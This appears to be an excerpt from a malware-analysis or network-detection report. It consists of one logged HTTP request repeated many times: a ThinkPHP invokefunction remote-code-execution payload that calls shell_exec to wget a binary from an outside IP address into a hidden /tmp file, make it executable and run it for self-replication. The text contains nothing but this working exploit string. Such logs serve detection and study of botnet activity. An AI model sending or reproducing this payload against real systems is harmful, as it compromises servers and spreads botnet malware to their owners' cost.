                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
                      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Bulu/2.0
